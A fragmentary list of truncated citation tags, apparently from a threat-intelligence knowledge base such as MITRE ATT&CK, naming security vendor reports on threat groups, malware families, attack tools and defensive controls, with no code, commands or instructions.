eWater Feb 2022),(Citation: TechNet Server Operator Scheduled Task),(Citation: Powersploit),(Citation: TechNet Scheduling Priority)
Github September 2018),(Citation: Dell TG-3390),(Citation: TechNet Server Operator Scheduled Task),(Citation: Powersploit),(Citation: Sec

le January 2022),(Citation: Talos Rocke August 2018),(Citation: Anomali Rocke March 2019),(Citation: NSA APT5 Citrix Threat Hunting Dece
tation: Cybereason Bazar July 2020),(Citation: CrowdStrike SUNSPOT Implant January 2021),(Citation: F-Secure CozyDuke),(Citation: ASERT

n: Symantec Linfo May 2012),(Citation: ESET Machete July 2019),(Citation: Kaspersky Adwind Feb 2016),(Citation: ESET ComRAT May 2020
WC KeyBoys Feb 2017),(Citation: Secureworks Karagany July 2019),(Citation: FireEye SMOKEDHAM June 2021),(Citation: ASERT Donot Marc

mber 2023),(Citation: Microsoft Star Blizzard August 2022),

24),(Citation: US District Court Indictment GRU Unit 74455 October 2020),(Citation: Volexity Ivanti Zero-Day Exploitation January 2024),(C

Microsoft ISAPICGIRestriction 2016)

e-2022),(Citation: Mandiant APT41),(Citation: Cybereason Soft Cell June 2019),(Citation: Unit42 Emissary Panda May 2019),(Citation: CISA

71 REvil March 2020),(Citation: Novetta Blockbuster Destructive Malware),(Citation: Trend Micro KillDisk 2),(Citation: Microsoft Prestige ra
Dtrack),(Citation: ESET Attor Oct 2019),(Citation: FireEye Know Your Enemy FIN8 Aug 2016),(Citation: ESET PipeMon May 2020),(Citation:
ge ransomware October 2022),
ComRAT May 2020),(Citation: Trend Micro Muddy Water March 2021),(Citation: Secureworks Gold Prelude Profile),(Citation: Trend Micro
los Bitter Bangladesh May 2022),(Citation: CrowdStrike AQUATIC PANDA December 2021),(Citation: Cylance Shell Crew Feb 2017),(Citatio

r 2022),(Citation: SentinelOne SocGholish Infrastructure November 2022),(Citation: Secureworks Gold Prelude Profile),(Citation: Proofpoin

TA407 September 2019),

onstone Sleet 2024),(Citation: Microsoft Unidentified Dec 2018),(Citation: McAfee Lazarus Jul 2020),(Citation: Volexity Ocean Lotus Novem

3),(Citation: CISA Star Blizzard Advisory December 2023),(Citation: Volexity InkySquid BLUELIGHT August 2021),(Citation: Sekoia Raccoon2
dit),(Citation: GitHub Certify)

c 2015),(Citation: Microsoft Preauthentication Jul 2012),(Citation: Stealthbits Cracking AS-REP Roasting Jun 2019)

,(Citation: Github PowerShell Empire),(Citation: STIG krbtgt reset)

itation: Mandiant FIN12 Oct 2021),(Citation: GitHub Rubeus March 2023),(Citation: DHS/CISA Ransomware Targeting Healthcare October
y Cracking Kerberos Dec 2015)

nder StrongPity June 2020),(Citation: Google Cloud APT41 2024),(Citation: Deep Instinct TA505 Apr 2019),(Citation: FireEye APT40 March
Turla Driver Loader),(Citation: F-Secure BlackEnergy 2014),(Citation: Microsoft TESTSIGNING Feb 2021)
,(Citation: Application Bundle Manipulation Brandon Dalton),(Citation: SentinelOne Cuckoo Stealer May 2024),(Citation: Carbon Black Shla
ee mac malware 2017),(Citation: SpectorOps Code Signing Dec 2017),(Citation: Wikipedia HPKP)
Dangers of VHD 2019),(Citation: GitHub MOTW)

Risks),(Citation: OWASP Top 10)

Dive Solorigate January 2021),(Citation: ESET Telebots June 2017),(Citation: CrowdStrike SUNSPOT Implant January 2021),(Citation: Cyber

n: Unit 42 Cobalt Gang Oct 2018),

ureList Silence Nov 2017),(Citation: Lookout Dark Caracal Jan 2018),(Citation: Cyber Forensicator Silence Jan 2019),(Citation: Group IB Silen
Microsoft Windows Defender Application Control),(Citation: Corio 2008),(Citation: TechNet Applocker vs SRP)

1),(Citation: Cybereason Chaes Nov 2020),(Citation: Unit 42 WhisperGate January 2022),

Citation: FireEye MuddyWater Mar 2018),(Citation: Qualys LolZarus),(Citation: Cybereason Cobalt Kitty 2017),(Citation: FireEye FIN7 April
2021),(Citation: Securelist Brazilian Banking Malware July 2020),(Citation: ESET Casbaneiro Oct 2019),(Citation: Cybereason Clop Dec 2020

eep Instinct Black Basta August 2022),(Citation: ZScaler Squirrelwaffle Sep 2021),(Citation: Malwarebytes Saint Bot April 2021),(Citation: Cy
itation: F-Secure CozyDuke),(Citation: Kaspersky Carbanak),(Citation: ESET Operation Groundbait),(Citation: Bitdefender APT28 Dec 2015),

42 KerrDown February 2019),(Citation: PWC KeyBoys Feb 2017),(Citation: PWC WellMess July 2020),(Citation: GitHub QuasarRAT),(Citation
itation: Kandji Cuckoo April 2024),(Citation: Kaspersky Transparent Tribe August 2020),(Citation: BlackBerry Amadey 2020),(Citation: Secur
rsky Sodin July 2019),(Citation: BleepingComputer Molerats Dec 2020),(Citation: DFIR_Quantum_Ransomware),(Citation: CrowdStrike Ryu
o April 2020),(Citation: Symantec Naid June 2012),(Citation: Sygnia Elephant Beetle Jan 2022),(Citation: Malwarebytes Saint Bot April 2021
ctinium February 2022),(Citation: Security Intelligence More Eggs Aug 2019),(Citation: Symantec Shuckworm January 2022),(Citation: FoxIT

aze March 2020),(Citation: Secureworks Karagany July 2019),(Citation: Checkpoint MosesStaff Nov 2021),(Citation: Palo Alto CVE-2015-311
: ESET Grandoreiro April 2020),(Citation: Fidelis Turbo),(Citation: Sofacy Komplex Trojan),(Citation: Malwarebytes Saint Bot April 2021),(Ci

(Citation: Emissary Trojan Feb 2016),(Citation: Unit42 Emissary Panda May 2019),(Citation: Mandiant APT1),(Citation: Intel 471 REvil March

un-only applescripts 2021),(Citation: trendmicro xcsset xcode project 2020),

2 Emissary Panda May 2019),(Citation: CISA AA20-239A BeagleBoyz August 2020),(Citation: Microsoft Moonstone Sleet 2024),(Citation: ESE
e Aug 2019),(Citation: Trend Micro KillDisk 2),(Citation: Talos Olympic Destroyer 2018),(Citation: Checkpoint MosesStaff Nov 2021),(Citatio
Security Egregor 2020),(Citation: Proofpoint Azorult July 2018),(Citation: Checkpoint MosesStaff Nov 2021),(Citation: CISA AR21-126A FIVE
s Falliere, Liam O Murchu, Eric Chien February 2011),(Citation: group-ib_redcurl2),(Citation: CarbonBlack Conti July 2020),(Citation: ESET G
Proofpoint RTF Injection),(Citation: TrendMicro Gamaredon April 2020),(Citation: CERT-EE Gamaredon January 2021),(Citation: Unit42 Sofa
utting Edge Part 3 February 2024),(Citation: Kaspersky Turla Penquin December 2014),(Citation: Chaos Stolen Backdoor),(Citation: Bleeping

ace External Sharing),(Citation: Google Workspace Data Loss Prevention),(Citation: Microsoft 365 External Sharing)

orks REvil September 2019),(Citation: MSTIC Nobelium Oct 2021),(Citation: DOJ APT10 Dec 2018),(Citation: CrowdStrike StellarParticle Janu
ess NPPSPY 2022),(Citation: RedLock Instance Metadata API 2018),(Citation: Microsoft MS14-025),(Citation: ADSecurity Finding Passwords

2018),(Citation: Amazon AWS IMDS V2)

tation: Kubernetes Service Accounts),(Citation: Microsoft AKS Azure AD 2023),(Citation: Kubernetes Cloud Native Security)
CrowdStrike Putter Panda),(Citation: Proofpoint TA505 Sep 2017),(Citation: Sygnia Elephant Beetle Jan 2022),(Citation: FireEye APT35 201
rickbot Feb 2019),(Citation: Cybereason Cobalt Kitty 2017),(Citation: group-ib_redcurl1),(Citation: SentinelOne Valak June 2020),(Citation:
tation),(Citation: GitHub SILENTTRINITY Modules July 2019),(Citation: MS14-025),(Citation: Microsoft MS14-025),(Citation: ADSecurity Find
(Citation: Trend Micro TeamTNT),(Citation: MSTIC FoggyWeb September 2021),(Citation: Cado Security TeamTNT Worm August 2020),(Cit

itation: Okta DPoP 2023)

Microsoft Token Protection 2023),(Citation: AWS Data Perimeters),(Citation: Okta DPoP 2023),(Citation: Microsoft Azure AD Admin Consent
Cobalt Kitty 2017),(Citation: CME Github September 2018),(Citation: McAfee Night Dragon),(Citation: Cobalt Strike TTPs Dec 2017),(Citation
antec Seaduke 2015),(Citation: GitHub Pupy),(Citation: Cybereason Cobalt Kitty 2017),(Citation: Adsecurity Mimikatz Guide),(Citation: AdSe

on: win10_asr)
20),(Citation: Deep Instinct Black Basta August 2022),(Citation: Malwarebytes Saint Bot April 2021),(Citation: Cisco Talos Bitter Bangladesh

n Banking Malware July 2020),(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ),(Citation: Amnesty Intl. Ocean Lotus February
ersecurity Advisory SVR TTP May 2021),(Citation: FireEye Know Your Enemy FIN8 Aug 2016),(Citation: FireEye FIN10 June 2017),(Citation: M
Eye Spy Email Nov 22),(Citation: Microsoft NICKEL December 2021),(Citation: Microsoft Holmium June 2020),(Citation: MSTIC DEV-0537 M
(Citation: Sygnia Elephant Beetle Jan 2022),(Citation: CISA GRU29155 2024),(Citation: Accenture HyperStack October 2020),(Citation: US-C
ber 2022),(Citation: ESET Dukes October 2019),(Citation: McAfee Night Dragon),(Citation: Mandiant Pulse Secure Zero-Day April 2021),(Cita
9 2024),(Citation: Microsoft Ransomware as a Service),(Citation: CrowdStrike StellarParticle January 2022),(Citation: ESET Crutch Decembe
eb2019),(Citation: DOJ FIN7 Aug 2018),(Citation: Talos Agent Tesla Oct 2018),(Citation: Talos ZxShell Oct 2014),(Citation: Kaspersky TajMah
la April 2020),(Citation: Cybereason Bazar July 2020),(Citation: NHS Digital Egregor Nov 2020),(Citation: Kaspersky Lyceum October 2021),(
Num July 2020),(Citation: Google Cloud APT41 2024),(Citation: SCILabs Malteiro 2021),(Citation: Cybereason Cobalt Kitty 2017),(Citation: S
19),(Citation: Talos Lokibot Jan 2021),(Citation: NCC Group Team9 June 2020),(Citation: JoeSecurity Egregor 2020),(Citation: Medium Eli Sa

s January 2022),(Citation: Microsoft WhisperGate January 2022),(Citation: SentinelOne SocGholish Infrastructure November 2022),(Citatio
),(Citation: ESET Grandoreiro April 2020),(Citation: Talos Group123),(Citation: FireEye APT37 Feb 2018),(Citation: FireEye FIN7 Aug 2018),(C
ET Dukes October 2019),(Citation: FireEye Periscope March 2018),(Citation: ESET RTM Feb 2017),(Citation: Securelist Dropping Elephant),(C
022),(Citation: Medium Metamorfo Apr 2020),(Citation: Fortinet Metamorfo Feb 2020),(Citation: F-Secure The Dukes),
September 2018),(Citation: McAfee Maze March 2020),(Citation: Morphisec Snip3 May 2021),(Citation: Checkpoint MosesStaff Nov 2021)
tion: Trend Micro Tick November 2019),(Citation: Medium KONNI Jan 2020),(Citation: CISA AR18-352A Quasar RAT December 2018),(Citati

mium June 2021),(Citation: Github PowerShell Empire),(Citation: FireEye FIN6 Apr 2019),(Citation: RedCanary Mockingbird May 2020),(Cita
int Naikon May 2020),(Citation: ESET PipeMon May 2020),(Citation: Github PowerShell Empire),(Citation: Talos ZxShell Oct 2014),(Citation

oft Netdom Trust Sept 2012)

,(Citation: cobaltstrike manual),(Citation: Tarrask scheduled task),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: GitHub Pu

itation: Google Cloud APT41 2024),(Citation: NCC Group Team9 June 2020),(Citation: AlienVault Sykipot 2011),(Citation: ESET Telebots De
lls Attacking Exchange MailSniper, 2016),(Citation: group-ib_redcurl2),(Citation: DFIR Report APT35 ProxyShell March 2022),(Citation: Crow
Orangeworm April 2018),(Citation: Lotus Blossom Jun 2015),(Citation: Cybereason Cobalt Kitty 2017),(Citation: RATANKBA),(Citation: Accen

on Persistence)

Attacks),(Citation: Mandiant APT29 Microsoft 365 2022),(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021),(Citation:
tion: Sygnia Elephant Beetle Jan 2022),(Citation: DFIR Report APT35 ProxyShell March 2022),(Citation: US-CERT TA18-074A),(Citation: Proo
are),(Citation: Mandiant APT29 Microsoft 365 2022)

APT1),(Citation: Microsoft Moonstone Sleet 2024),(Citation: Zdnet Kimsuky Group September 2020),(Citation: Kaspersky Winnti April 2013

astructure November 2022),(Citation: US District Court Indictment GRU Unit 74455 October 2020),(Citation: FoxIT Wocao December 2019

TIC DEV-0537 Mar 2022),(Citation: unit42_gamaredon_dec2022),(Citation: CISA GRU29155 2024),(Citation: FireEye TRITON 2019),(Citation
itation: Anomali Static Kitten February 2021),(Citation: CISA AppleJeus Feb 2021),(Citation: Proofpoint TA2541 February 2022),(Citation: C

cro Pawn Storm 2019),(Citation: Mandiant Cutting Edge Part 3 February 2024),(Citation: CISA AA20-296A Berserk Bear December 2020),(C
as SMB Relay),(Citation: ADSecurity Windows Secure Baseline),(Citation: Microsoft SMB Packet Signing),(Citation: byt3bl33d3r NTLM Relay
tion: Mandiant APT29 Eye Spy Email Nov 22),(Citation: Talos Rocke August 2018),(Citation: Unit 42 Lucifer June 2020),(Citation: Symantec
tion: PTSecurity Cobalt Dec 2016),(Citation: Bishop Fox Sliver Framework August 2019),(Citation: Cybereason Cobalt Kitty 2017),(Citation: P
Unit42 SilverTerrier 2018),(Citation: Talos ZxShell Oct 2014),(Citation: Mythc Documentation),(Citation: Unit 42 CARROTBAT November 20
nse Agent Tesla),(Citation: ESET ComRAT May 2020),(Citation: Fortinet Agent Tesla June 2017),(Citation: Unit42 SilverTerrier 2018),(Citatio

ation: cobaltstrike manual),(Citation: Secureworks DarkTortilla Aug 2022),(Citation: Intezer TeamTNT September 2020),(Citation: Infoblox
oogle Cloud APT41 2024),(Citation: Novetta Blockbuster Loaders),(Citation: Novetta Blockbuster Tools),(Citation: Kaspersky NetTraveler),(C
nt Tesla Oct 2018),(Citation: McAfee Lazarus Resurfaces Feb 2018),(Citation: Symantec Chafer Dec 2015),(Citation: Malwarebytes Konni Au
Lazarus Resurfaces Feb 2018),(Citation: Avira Mustang Panda January 2020),(Citation: SentinelLabs Metador Sept 2022),(Citation: ThreatE
er RATs),(Citation: Securelist Denis April 2017),(Citation: Bitdefender FunnyDream Campaign November 2020),(Citation: ESET InvisiMole J
mantec Calisto July 2018),(Citation: Mandiant Cutting Edge Part 2 January 2024),(Citation: Kaspersky MoleRATs April 2019),(Citation: Cyber
x April 2017),(Citation: Symantec Chafer Dec 2015),(Citation: FireEye Periscope March 2018),(Citation: ESET EvasivePanda 2023),(Citation:
June 2020),(Citation: Google Cloud APT41 2024),(Citation: Mandiant FIN5 GrrCON Oct 2016),(Citation: Talos Frankenstein June 2019),(Cita
22 ),(Citation: ESET Crutch December 2020),(Citation: CERT-UA WinterVivern 2023),(Citation: ESET LightNeuron May 2019),(Citation: ESET

12 Oct 2021),(Citation: Group IB Ransomware September 2020),(Citation: NCC Group Team9 June 2020),(Citation: Microsoft PLATINUM Ap

Increasing Linux kernel integrity),(Citation: Wikibooks Grsecurity),(Citation: MDMProfileConfigMacOS),(Citation: Kernel Self Protection Pro

tion: Malwarebytes Saint Bot April 2021),(Citation: Cybereason Bazar July 2020),(Citation: Trend Micro Tick November 2019),(Citation: Kasp

Citation: IBM Grandoreiro April 2020),(Citation: FireEye Periscope March 2018),(Citation: Github PowerShell Empire),(Citation: ESET Okrum

n: TrendMicro Tropic Trooper May 2020),(Citation: ESET Gazer Aug 2017),(Citation: Microsoft PLATINUM April 2016),(Citation: CitizenLab K

018),(Citation: Technospot Chrome Extensions GP)

2),(Citation: Threatpost Lizar May 2021),(Citation: CyberBit Dtrack),(Citation: Cybereason PowerLess February 2022),(Citation: Github Powe
pril 2020),(Citation: Fidelis TrickBot Oct 2016),(Citation: Cyberint Qakbot May 2021),(Citation: TrendMicro BKDR_URSNIF.SM),(Citation: De
ride 2018),(Citation: Aqua Kinsing April 2020),(Citation: CISA GRU29155 2024),(Citation: Securelist DarkVishnya Dec 2018),(Citation: CERT-
nt SpeakUp Feb 2019),(Citation: Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020),(Citation: Malwarebytes Pony April 2016
TIUM New Patterns Cred Harvesting Sept 2020),(Citation: MSRC Nobelium June 2021),(Citation: CISA GRU29155 2024),(Citation: Cybersec

nking Malware July 2020),(Citation: Talos Agent Tesla Oct 2018),(Citation: ESET Casbaneiro Oct 2019),(Citation: Cylance Cleaver),(Citation:

ne 2017),(Citation: Cybereason Cobalt Kitty 2017),(Citation: Mandiant FIN5 GrrCON Oct 2016),(Citation: Lumen Versa 2024),(Citation: Proo

CISA AA22-055A MuddyWater February 2022),(Citation: ESET EvilNum July 2020),(Citation: FireEye FIN7 Aug 2018),(Citation: Zscaler Higa

s Emotet Dec 2018),(Citation: Cisco Ukraine Wipers January 2022),(Citation: Kaspersky APT Trends Q1 April 2021),(Citation: CME Github Se
: Microsoft Ransomware as a Service),(Citation: Checkpoint MosesStaff Nov 2021),(Citation: Mandiant Cutting Edge Part 3 February 2024),
21),(Citation: ESET DazzleSpy Jan 2022),(Citation: Mandiant Pulse Secure Zero-Day April 2021),(Citation: Trend Micro MacOS Backdoor Nov
rend Micro Tick November 2019),(Citation: Securelist Brazilian Banking Malware July 2020),(Citation: Unit 42 KerrDown February 2019),(C
Apr 2020),(Citation: FireEye FIN10 June 2017),(Citation: CrowdStrike Ryuk January 2019),(Citation: Volexity PowerDuke November 2016),(C

021),(Citation: MSTIC DEV-0537 Mar 2022),(Citation: SecureWorks August 2019),(Citation: Mandiant APT29 Microsoft 365 2022),(Citation:

tation: ESET Ebury Feb 2014),(Citation: Mandiant Cutting Edge Part 3 February 2024),(Citation: wardle evilquest partii),(Citation: reed thie

e Lazarus Jul 2020),(Citation: SentinelOne Gootloader June 2021),(Citation: SocGholish-update),(Citation: KISA Operation Muzabi),(Citation
nti Global Exploitation January 2024),(Citation: Lumen Versa 2024),
amon Berserk Bear October 2021),(Citation: Bleeping Computer Op Sharpshooter March 2019),(Citation: Crowdstrike Indrik November 201

,(Citation: Kubernetes Admission Controllers),(Citation: Kubernetes Security Context),(Citation: Microsoft AKS Azure AD 2023),(Citation: Ku
23),(Citation: Kubernetes Cloud Native Security)

thub PowerShell Empire),(Citation: Savill 1999),(Citation: Dragos Crashoverride 2018),

Citation: Symantec Calisto July 2018),(Citation: Github PowerShell Empire),(Citation: Intezer HiddenWasp Map 2019),(Citation: Savill 1999
acKeeper Bundlore Apr 2019),(Citation: SentinelOne Lazarus macOS July 2020),(Citation: SentinelOne Cuckoo Stealer May 2024),(Citation:
: CISA AppleJeus Feb 2021),(Citation: ObjectiveSee AppleJeus 2019),(Citation: NCSC-NL COATHANGER Feb 2024),(Citation: SentinelOne Laz
Pupy),(Citation: ANSSI Sandworm January 2021),(Citation: Fysbis Dr Web Analysis),(Citation: Cisco Talos Intelligence Group),
ation: PWC KeyBoys Feb 2017),(Citation: Lastline PlugX Analysis),(Citation: TrendMicro PE_URSNIF.A2),(Citation: Checkpoint MosesStaff No
s Agent Tesla April 2020),(Citation: SCILabs Malteiro 2021),(Citation: Microsoft Deep Dive Solorigate January 2021),(Citation: Kaspersky Ly

on: GitHub LaZagne Dec 2018),(Citation: Check Point Warzone Feb 2020),(Citation: FireEye NETWIRE March 2019),(Citation: DustySky),(Cita
2018),(Citation: objsee mac malware 2017),
xIT Wocao December 2019),(Citation: NCC Group LAPSUS Apr 2022),(Citation: NIST 800-63-3)

ndiant FIN12 Oct 2021),(Citation: BiZone Lizar May 2021),(Citation: PowerSploit Documentation),(Citation: SentinelOne Valak June 2020),(
537 Mar 2022),(Citation: Cisco CaddyWiper March 2022),(Citation: Intel 471 REvil March 2020),(Citation: Unit 42 Shamoon3 2018),(Citation

on: McAfee Oceansalt Oct 2018),(Citation: DHS CISA AA22-055A MuddyWater February 2022),(Citation: Mandiant ROADSWEEP August 20
ndiant Pulse Secure Zero-Day April 2021),(Citation: ESET Operation Groundbait),(Citation: Microsoft PLATINUM April 2016),(Citation: Kaspe
gregor Nov 2020),(Citation: Checkpoint MosesStaff Nov 2021),(Citation: CISA AR21-126A FIVEHANDS May 2021),(Citation: wardle evilques

024),(Citation: ESET Okrum July 2019),(Citation: Proofpoint TA505 Mar 2018),(Citation: FoxIT Wocao December 2019),(Citation: CISA MAR
tion: Dell P2P ZeuS),(Citation: Securelist APT10 March 2021),(Citation: TrendMicro BlackTech June 2017),(Citation: Group IB GrimAgent Jul
g Edge Part 2 January 2024),(Citation: ESET Okrum July 2019),(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023
LightNeuron May 2019),(Citation: Proofpoint ZeroT Feb 2017),(Citation: FireEye SUNBURST Backdoor December 2020),(Citation: GitHub S
t 2021),(Citation: Mandiant Suspected Turla Campaign February 2023),(Citation: ESET Kobalos Jan 2021),(Citation: Kaspersky Lyceum Octo
SET Operation Groundbait),(Citation: ESET Crutch December 2020),(Citation: FireEye NETWIRE March 2019),(Citation: Symantec Calisto Ju
e 2017),(Citation: Symantec Cicada November 2020),(Citation: CISA AA21-200A APT40 July 2021),(Citation: PWC Cloud Hopper April 2017),
: Unit42 RDAT July 2020),(Citation: Mandiant Suspected Turla Campaign February 2023),(Citation: Talos Oblique RAT March 2021),(Citation
019),(Citation: Amazon AWS Temporary Security Credentials),(Citation: Microsoft Azure Storage Security, 2019),(Citation: Google Cloud En

2021),(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021),(Citation: AWS DB VPC),(Citation: TrustedSec OOB Communic

n: NCC Group LAPSUS Apr 2022),

: Malwarebytes Saint Bot April 2021),(Citation: Cybereason Bazar July 2020),(Citation: Symantec Pasam May 2012),(Citation: Mandiant FIN
259A Iran-Based Actor September 2020),(Citation: NHS Digital Egregor Nov 2020),(Citation: ESET Gamaredon June 2020),(Citation: group-ib
amsay May 2020),(Citation: F-Secure Cosmicduke),(Citation: Talos Oblique RAT March 2021),(Citation: Bitdefender FunnyDream Campaign
er Pikabot 2023),(Citation: Trellix Darkgate 2023),(Citation: Telefonica Snip3 December 2021),(Citation: Elastic Pikabot 2024),(Citation: NCC
),(Citation: Microsoft BlackCat Jun 2022),(Citation: Fortinet Diavol July 2021),(Citation: Secureworks GOLD IONIC April 2024),(Citation: CER
PWC WellMess July 2020),(Citation: CISA AR21-126A FIVEHANDS May 2021),(Citation: Check Point Warzone Feb 2020),(Citation: Medium M
tect),(Citation: Kubernetes RBAC),(Citation: Kubernetes API Control Access),(Citation: Microsoft AKS Azure AD 2023),(Citation: Kubernetes

tation: Microsoft Deep Dive Solorigate January 2021),(Citation: Cylance Cleaver),(Citation: CrowdStrike SUNSPOT Implant January 2021),(C

tion: Crowdstrike DriveSlayer February 2022),(Citation: SentinelOne Hermetic Wiper February 2022),(Citation: Novetta Blockbuster Destru
Citation: Cisco CaddyWiper March 2022),(Citation: Unit 42 Shamoon3 2018),(Citation: Medium S2W WhisperGate January 2022),(Citation:
n: Red Canary SocGholish March 2024),(Citation: Harmj0y Domain Trusts),(Citation: Cybereason Bazar July 2020),(Citation: Microsoft Deep

ation: Check Point Meteor Aug 2021),(Citation: Github PowerShell Empire),(Citation: Intrinsec Egregor Nov 2020),(Citation: Microsoft Presti

r StrongPity June 2020),(Citation: ESET ComRAT May 2020),(Citation: Secureworks IRON TWILIGHT Active Measures March 2017),(Citation
022),(Citation: Unit 42 Gamaredon February 2022),(Citation: FireEye APT30),(Citation: Talos Bisonal Mar 2020),(Citation: ESET Operation S

elist Brazilian Banking Malware July 2020),(Citation: FireEye POSHSPY April 2017),(Citation: ESET Dukes October 2019),(Citation: Accenture

motes Wi-Fi Spreader),(Citation: Certfa Charming Kitten January 2021),(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2),(Ci
ft Tim McMichael Exchange Mail Forwarding 2),(Citation: Microsoft BEC Campaign),(Citation: Pfammatter - Hidden Inbox Rules),(Citation: M
rn 2023),(Citation: Github PowerShell Empire),(Citation: F-Secure Cosmicduke),(Citation: Trend Micro Qakbot December 2020),(Citation: g
on: Volexity SolarWinds),(Citation: Mandiant APT1),(Citation: Cybersecurity Advisory SVR TTP May 2021),(Citation: ESET LightNeuron May
TWIRE January 2020),(Citation: DHS CISA AA22-055A MuddyWater February 2022),(Citation: Lumen KVBotnet 2023),(Citation: TrendMicro
P GitHub),(Citation: Medium Metamorfo Apr 2020),(Citation: Mandiant APT1 Appendix),(Citation: FireEye Know Your Enemy FIN8 Aug 2016
zorult July 2018),(Citation: US-CERT HOTCROISSANT February 2020),(Citation: Kaspersky Carbanak),(Citation: MSTIC FoggyWeb Septembe

Court Indictment GRU Unit 74455 October 2020),(Citation: FoxIT Wocao December 2019),(Citation: Google EXOTIC LILY March 2022),(Citati
TIC LILY March 2022),(Citation: KISA Operation Muzabi),(Citation: ClearSky Kittens Back 3 August 2020),(Citation: Microsoft Moonstone Sle

tion: Windows Commands JPCERT),(Citation: NSA MS AppLocker),(Citation: Beechey 2010),(Citation: Microsoft Windows Defender Applica

plication Control),(Citation: Corio 2008),(Citation: TechNet Applocker vs SRP)

rocy May 2019),(Citation: ESET Sednit Part 1),(Citation: Kaspersky WIRTE November 2021),(Citation: Palo Alto Networks BBSRAT),(Citation:

ation: Kaspersky Lyceum October 2021),(Citation: ESET Dukes October 2019),(Citation: FireEye Periscope March 2018),(Citation: FireEye A
dMicro RaspberryRobin 2022),(Citation: Sandfly BPFDoor 2022),(Citation: unit42_gamaredon_dec2022),(Citation: McAfee Lazarus Nov 202
ation QA),(Citation: Twitter ItsReallyNick APT41 EK),(Citation: Volexity InkySquid RokRAT August 2021),

e Advisory December 2023),(Citation: Trend Micro Ransomware Spotlight Play July 2023),(Citation: Cybereason Chaes Nov 2020),(Citation

Microsoft FTP),(Citation: ESET OceanLotus Mar 2019),(Citation: Red Canary SocGholish March 2024),(Citation: Talos Agent Tesla Oct 2018)
t 42 OutSteel SaintBot February 2022 ),(Citation: FireEye SMOKEDHAM June 2021),(Citation: ESET Crutch December 2020),(Citation: ward

ng Panda January 2020),(Citation: Microsoft Disable Autorun),(Citation: TechNet Removable Media Control)

ygnia Emperor Dragonfly October 2022),(Citation: ESET Lazarus Jun 2020),(Citation: Talent-Jump Clambling February 2020),(Citation: FireEy

CrowdStrike PIONEER KITTEN August 2020),(Citation: Proofpoint WinterVivern 2023),(Citation: Mandiant Cutting Edge Part 2 January 2024
n: Palo Alto Unit 42 OutSteel SaintBot February 2022 ),(Citation: Crowdstrike MUSTANG PANDA June 2018),(Citation: Kaspersky CactusPete

ersky ProjectSauron Technical Analysis),(Citation: FireEye FIN6 April 2016),(Citation: Bitdefender APT28 Dec 2015),(Citation: Unit 42 Silosca
FireEye KEGTAP SINGLEMALT October 2020),(Citation: Symantec Emotet Jul 2018),(Citation: US-CERT WannaCry 2017),(Citation: CrowdSt
O Campaign December 2022),(Citation: CISA Play Ransomware Advisory December 2023),(Citation: Mandiant FIN5 GrrCON Oct 2016),(Citati
ber 2021),(Citation: Mythc Documentation),(Citation: ESET Dukes October 2019),(Citation: McAfee Night Dragon),(Citation: ESET Crutch D
itation: CISA AR21-126A FIVEHANDS May 2021),(Citation: Camba RARSTONE),(Citation: Check Point Warzone Feb 2020),(Citation: Bitdefen

Kinsing April 2020),(Citation: Carbon Black Shlayer Feb 2019),(Citation: Uptycs Black Basta ESXi June 2022),(Citation: NCSC-NL COATHANGE
(Citation: Microsoft PLATINUM April 2016),(Citation: NCC Group WastedLocker June 2020),
ation: Trellix Scattered Spider MO August 2023),(Citation: Secureworks GOLD IONIC April 2024),(Citation: Cybereason INC Ransomware No
n August 2021),(Citation: CISA AA24-038A PRC Critical Infrastructure February 2024),(Citation: FoxIT Wocao December 2019),
(Citation: CISA AA21-200A APT40 July 2021),(Citation: Microsoft Targeting Elections September 2020),(Citation: NCC Group LAPSUS Apr 20
ebruary 2022 ),(Citation: Amnesty Intl. Ocean Lotus February 2021),(Citation: AADInternals Documentation),(Citation: US District Court Ind

Folder Exclusions)

itation: McAfee Lazarus Resurfaces Feb 2018),(Citation: Avira Mustang Panda January 2020),(Citation: Rapid7 HAFNIUM Mar 2021),(Citatio

018),(Citation: Malwarebytes Agent Tesla April 2020),(Citation: Secureworks MCMD July 2019),(Citation: Cybereason Cobalt Kitty 2017),(Ci

rik November 2018),(Citation: LOLBAS Expand),(Citation: ESET Gazer Aug 2017),(Citation: Elastic Latrodectus May 2024),(Citation: Cybereas

n 2022),(Citation: NCSC-NL COATHANGER Feb 2024),(Citation: Cybereason Cobalt Kitty 2017),(Citation: Microsoft CreateProcess),(Citation:

r 2021),(Citation: FireEye APT10 April 2017),(Citation: Palo Alto Brute Ratel July 2022),(Citation: MSTIC FoggyWeb September 2021),(Citatio
2020),(Citation: Unit 42 KerrDown February 2019),(Citation: Medium Metamorfo Apr 2020),(Citation: Recorded Future REDDELTA July 202
ro xcsset xcode project 2020),(Citation: Crowdstrike HuntReport 2022),(Citation: Apple Developer Doco Hardened Runtime)

ppLocker),(Citation: Microsoft Windows Defender Application Control),(Citation: SANS Application Whitelisting),(Citation: Microsoft Dynam
ndows Defender Application Control),(Citation: SANS Application Whitelisting),(Citation: Microsoft Dynamic-Link Library Security),(Citation
ndows Defender Application Control),(Citation: SANS Application Whitelisting),(Citation: Microsoft Dynamic-Link Library Security),(Citation

January 2021),(Citation: def_ev_win_event_logging),(Citation: win_xml_evt_log)

,(Citation: Novetta Blockbuster Loaders),(Citation: Group-IB Anunak),(Citation: Talos ZxShell Oct 2014),(Citation: Microsoft Deep Dive Solor
t 42 OutSteel SaintBot February 2022 ),(Citation: Check Point Warzone Feb 2020),(Citation: Medium Metamorfo Apr 2020),(Citation: Micr

on: Crowdstrike DriveSlayer February 2022),(Citation: SentinelOne Hermetic Wiper February 2022),(Citation: MalwareBytes WoodyRAT Au
asta August 2022),(Citation: Minerva Labs Black Basta May 2022),(Citation: CyberArk Labs Safe Mode 2016)

r 2022),(Citation: Crowdstrike TELCO BPO Campaign December 2022),(Citation: MSTIC Octo Tempest Operations October 2023),(Citation:

Mandiant Pulse Secure Zero-Day April 2021),(Citation: US-CERT Bankshot Dec 2017),(Citation: Bitdefender Sardonic Aug 2021),(Citation: Sa
DFIR Report APT35 ProxyShell March 2022),(Citation: Cisco Talos Intelligence Group),(Citation: Crowdstrike HuntReport 2022),(Citation: Se

